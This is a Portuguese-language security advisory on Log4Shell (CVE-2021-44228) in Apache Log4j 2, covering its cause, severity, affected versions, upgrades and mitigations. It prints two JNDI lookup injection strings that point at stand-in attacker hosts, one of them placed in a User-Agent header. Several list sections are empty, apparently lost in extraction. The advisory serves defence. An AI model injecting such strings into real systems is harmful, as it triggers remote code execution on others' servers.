
CVE-2021-44228
Uma vulnerabilidade crítica de execução remota de código no Apache Log4j 2, amplamente conhecida como Log4Shell.
CVE-2021-44228 é uma vulnerabilidade crítica de RCE no Apache Log4j 2 versão 2.x (antes de 2.15.0), descoberta em dezembro de 2021.
Ela permite que atacantes remotos não autenticados executem código arbitrário em sistemas vulneráveis simplesmente ao enviar uma entrada especialmente criada que é registrada pelo Log4j. A falha afeta inúmeros aplicativos e serviços baseados em Java globalmente.
A vulnerabilidade surge do tratamento de lookups JNDI em strings registradas pelo Log4j. Um atacante pode incorporar um recurso JNDI malicioso em uma mensagem registrada (ex.: LDAP, DNS), como:
${jndi:ldap://attacker.com/a}
O Log4j irá:
Isso permite que um atacante alcance Execução Remota de Código (RCE) completa nos serviços afetados.
| Métrica | Detalhe |
|---|---|
| Pontuação Base CVSS v3.1 | 10.0 (Crítico) |
| Vetor de Ataque | Rede |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhuma |
| Autenticação | Não necessária |
| Impacto | RCE total |
Como o Log4j é usado em inúmeras bibliotecas e aplicativos, qualquer sistema que registre dados não confiáveis pode ser vulnerável.
As seguintes versões do Log4j 2 são vulneráveis:
> = 2.0-beta9 e < 2.15.0
Além disso, algumas configurações do 2.15.0 ainda eram exploráveis, então 2.16.0 e posteriores são a base segura.
Atualize para as versões do Log4j 2:
2.17.1 ou posterior
Patches posteriores melhoram ainda mais a segurança (ex.: 2.17.2, 2.19.0, etc.).
Se a atualização imediata não for possível, você pode:
log4j2.formatMsgNoLookups=true
JndiLookup do classpath:
zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Essas etapas ajudam a reduzir a exposição até que você possa atualizar.



Esta vulnerabilidade é extremamente fácil de explorar. Um atacante só precisa enviar uma string manipulado (ex.: via cabeçalhos HTTP, parâmetros de formulário, mensagens de chat, campos de banco de dados) que seja registrada pelo aplicativo:
User-Agent: ${jndi:ldap://attacker.example/a}
Uma vez registrada, o aplicativo realizará um lookup remoto e poderá ser forçado a executar código Java controlado pelo atacante.
O Log4Shell teve um impacto global massivo:
Esta é uma das vulnerabilidades mais significativas em décadas.
Você pode detectar sistemas vulneráveis:
${jndi:)| Campo | Valor |
|---|---|
| ID CVE | CVE-2021-44228 |
| Apelido | Log4Shell |
| Produto | Apache Log4j 2 |
| Gravidade | Crítico (CVSS 10.0) |
| Tipo | Execução Remota de Código |
| Impacto | Comprometimento total do sistema |
| Explorabilidade | Extremamente fácil |
| Mitigação | Atualizar para ≥ 2.17.1 |
Se seu aplicativo ou qualquer biblioteca que você usa depende do Log4j 2.x, atualize imediatamente para uma versão corrigida (≥ 2.17.1) e verifique se os lookups JNDI estão desabilitados ou removidos onde possível.